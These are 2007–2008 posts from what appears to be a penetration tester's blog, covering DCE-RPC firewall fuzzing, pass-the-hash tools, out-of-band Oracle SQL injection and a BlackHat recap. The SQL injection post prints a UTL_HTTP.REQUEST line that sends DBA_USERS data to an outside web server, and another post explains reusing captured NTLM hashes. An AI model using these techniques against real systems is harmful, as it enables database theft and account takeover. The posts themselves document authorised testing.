Saturday, May 3, 2008

Fun with DCE-RPC Fuzzing

I recently finished working on an interesting project that was a mix of architecture assessment and penetration testing.  One of our key tasks was to analyze the effectiveness of a firewall that they had configured to perform layer 7 inspection of Windows DCE-RPC traffic.  The firewall was designed to enforce a white-list of allowed RPC services (based on UUID) and deny all others.  It also did some fancy dynamic port management, automatically opening/closing high-number ports for permitted RPC connections.  
Our pen-tests usually don't entail a significant amount of packet crafting and manipulation, since we're more typically working at the OS or application level.  So testing this firewall's RPC filtering mechanism was a fun challenge.  We ended up relying on two tools to perform fuzzing attacks, primarily manipulating the UUID and function call fields in the RPC packets:
  • Impacket - A collection of Python classes developed by the Core Security guys.  Includes support for DCE-RPC v4 and v5.  I used this to write up a number of scripts for each test case.
  • SPIKE - Popular fuzz testing framework based in C - it includes a pre-built msrpc fuzzing tool.
I initially wanted to use Scapy, but it unfortunately doesn't have native support for DCE-RPC and I didn't have the time (or skill) to build out the protocol.  Of course, we also heavily relied upon Wireshark since it decodes DCE-RPC v5 very nicely, and Metasploit to launch a few known RPC exploits.
After extensive brainstorming and failed attempts with my colleague, we were able to trick the firewall into opening RPC ports by spoofing valid RPC sessions - but only for white-listed UUIDs.  I was more interested in getting the firewall to choke on malformed endpoint mapper requests or other RPC packets, and possibly create denial of service conditions (or get packets with disallowed UUIDs past the filtering mechanism).  No luck there, mostly due to how the RPC endpoint mapper and firewall work together to dynamically open ports.  The specific port opened for an RPC service is dictated by the endpoint mapper response and cannot be defined by the initial request - which makes sense, the client shouldn't have any say in what port the server chooses for the service. 
Despite failing to completely own the firewall, designing and implementing our testing approach was a great experience - especially coding the Python test scripts with Impacket.

Thursday, August 23, 2007

Pass the hash, NTLM style

Way back in 1997, a Windows exploit named "NT Pass the Hash" was posted on Bugtraq. This Unix-based tool was a modified SMB client that lets you use captured LanMan hashes, without having to decrypt them first.

After a mere ten years, someone has finally modernized this concept into a much more potent attack. Core Security has released Pass-The-Hash Toolkit, which runs on Windows and works with NTLM hashes. It's comprised of two key modules:
  • IAM.EXE - This tool "injects" another user's NTLM credentials into your current Windows logon session, given their username, Windows domain, and NTLM hash. You can then use the 'net' tools or any other Windows software that authenticates via NTLM, all under the assumed privileges of the compromised user account.
  • WHOSTHERE.EXE - Lists the usernames and NTLM hashes of all users logged on to a system.
No password cracking required! So if you own other systems on the network, you can just run whosthere.exe on them until you snag a domain admin's hashes. Or you could use a man-in-the middle attack, like the WPAD proxy exploit. As I discussed a few posts ago, the Metasploit guys covered several methods for grabbing NTLM hashes in their Tactical Exploitation presentation at BlackHat.

Wednesday, August 15, 2007

Out-of-band Oracle SQL injection with HTTP Requests

I spent most of last week performing a web application assessment in the middle of nowhere, Alabama. After the mad fun at BlackHat and several weeks of unpleasant documentation work preceding it, it was a nice change to spend five peaceful days completely focused on testing an interesting system.

This was an internal application, so I wasn't surprised to find that it was vulnerable to SQL injection in several areas. However, in-band injection attacks weren't working for the application I was testing - I couldn't use UNION SELECTs, for example, to merge my query results with data rendered in the browser. So I had to leverage an out-of-band technique for retrieving data through SQL injection: Oracle's UTL_HTTP.REQUEST function. David Litchfield mentioned this approach almost two years ago in Data-mining with SQL Injection and Inference, but I never had the need to use it "in the wild" until now.

UTL_HTTP is a built-in Oracle SQL function that issues HTTP requests. The syntax is pretty simple: 

URL_HTTP.REQUEST('http://www.foo.com/index.php'
returns the first 2000 bytes from the provided URL. But the clever bit is that you can concatenate the URL with another SQL statement, the results of which will become part of the request.

For example, consider the following SQL:

UTL_HTTP.REQUEST('http://www.foo.com:80/'||(SELECT USERNAME FROM DBA_USERS WHERE ROWNUM=1))

The SELECT statement returns the value "SYS" - the first user in the DBA_USERS table. The HTTP request issued by the database is therefore for the URL "http://www.foo.com:80/SYS". In www.foo.com's HTTP access log, the request would look like:

158.72.4.21 - - [08/Aug/2007:10:02:40 +0000] "GET /SYS HTTP/1.1" 404 0 - -
(assuming 158.72.4.21 is our target DB server)

So as an attacker, you simply need to run a web server and point the UTL_HTTP.REQUESTs to your own IP address. You can then view the result of each SQL injection in your server logs. If in Windows, I like to use SHTTPD as it is lightweight and simple to turn on and off.

The biggest limitation to this approach is that you can only query for one row at a time - you'll get an error message if your statement returns multiple rows. (That is due to the UTL_HTTP.RQUEST function itself, not the web server end). But it is still a lot more efficient then using blind SQL injection to brute force one character of a response at a time. Oracle will also throw an error if it can't reach your web server, which may be the case depending on network controls between yourself and the database.  Experiment with running on different ports.

There are probably a few things you could do to make the attack more elegant, like setting up a CGI script on your server to better collect and parse the calls from the database. You could also create and inject a PL/SQL function that concatenates results from multiple rows to get around the single-row limitation. I needed a quick and dirty solution to get a few key database records, so I didn't bother venturing beyond the basics for this test.

Outbound HTTP requests originating from a database server should look suspicious, but I think the attack is obscure enough to slip by most admins.

Monday, August 13, 2007

SensePost Releases Squeeza SQL Injector, Updates Wikto

As referenced in my BlackHat wrap-up, SensePost has just released the squeeza tool and accompanying slide deck from their presentation.  Their work on timing-based attacks is really interesting, particularly what they have dubbed as "Cross-Site Request Timing": it's apparently possible to violate the same-origin policy by tracking page load times across multiple domains. They've also released an update to Wikto, bumping it to 2.0 - judging from the change log it's a pretty substantial re-write.

Saturday, August 4, 2007

BlackHat Wrap-Up

I've returned and recovered from a fun week at BlackHat in Las Vegas.  The conference was a great experience and had an excellent selection of speakers.  As with other hacking conventions I've attended in the past, it was humbling to see how smart some of the presenters and attendees are.  I unfortunately couldn't make it to Defcon this year (damn client obligations!), but four days is just about the right length of time to stay in Vegas.  

To share a few random observations and cool things:
  • At this point it should be clear that browser vulnerabilities are this "generation's" OS-level vulnerabilities.  Owning the client means you can do just about anything, including full-fledged attacks against internal networks.  David Byrne's anti-DNS pinning really drove this home, particularly when he used Java LiveConnect to proxy a full Nessus scan against an internal host through the browser. 
  • Billy Hoffman's talk on "The Little Hybrid Web Worm That Could" was really interesting - he's always a good presenter.  He illustrated several pieces of proof-of-concept JavaScript code that can self-mutate, parse sites like Secunia to "learn" new vulnerabilities, and exploit web application vulnerabilities.  It won't be long before we see these kinds of worms in the wild, as the technology and research are already in place.  
  • Errata security demo'd a tool called Ferret that combines WiFi sniffing and gathering sensitive information into somewhat of a point-and-click affair.  It works with a HTTP proxy component that lets you easily use session cookies hijacked from other users' browser sessions.  He used it to hop on to an attendee's GMail account while on stage, which really got the audience going.  There's nothing new here - we all know you can sniff and re-use cookies from non-SSL'd connections - but the tool is still a neat implementation.
  • A presentation on extrusion detection systems by Matasano ended up being far more interesting than I expected.  While their research focused on vulnerabilities in agent-based tools designed to prevent information leakage, it conceptually applied to any agent-based product (I'm thinking of SIM tools in particular).  Through reverse engineering, they revealed how trivial it would be to take over agents, execute code at the Windows kernel level, spoof reporting data, and cause other havoc.  It made me really want to grab a copy of PaiMei and learn more about reversing and fuzzing.
  • The Metasploit team gave a fantastic two-part presentation (available on their site) on tactical penetration testing.  Their message was one we've always preached to our clients: pen-testing should not just be vulnerability scanning and firing off exploits.  They covered some interesting new resources for footprinting targets and network discovery, such as DomainTools.com and Paterva.com.  

    The presentation also included a demo of a new Metasploit component that facilitates NTLM hijacking.  You basically capture the victim's NTLM hash through a man-in-the-middle attack (the WPAD proxy hijack technique works great for this), and can then re-use this hash to authenticate with the user's credentials.  There's no need to crack the NTLM hash!  I plan on testing this one out in our lab - although our rules of engagement unfortunately often forbid us from performing network redirection attacks against clients.   
  • SensePost had a presentation on timing-based attacks that I wish I had not missed.   They demonstrated "SensePost-aTime", which leverages timing information to perform SQL injection and extract data.  I couldn't find it on their web-site yet, but will post as soon as a link is available.  Until then, you can check out a recent post on ha.ckers.org that covers a "res://" timing attack that enumerates a user's local files through the browser.
  • My "Best Booth Gimmick" award goes to Fortify Software - their Borat-inspired "Discover Hackistan" promotion was pretty damn funny.
Personal goal for next year: to put together a presentation that I can at least attempt to submit for BlackHat or Defcon.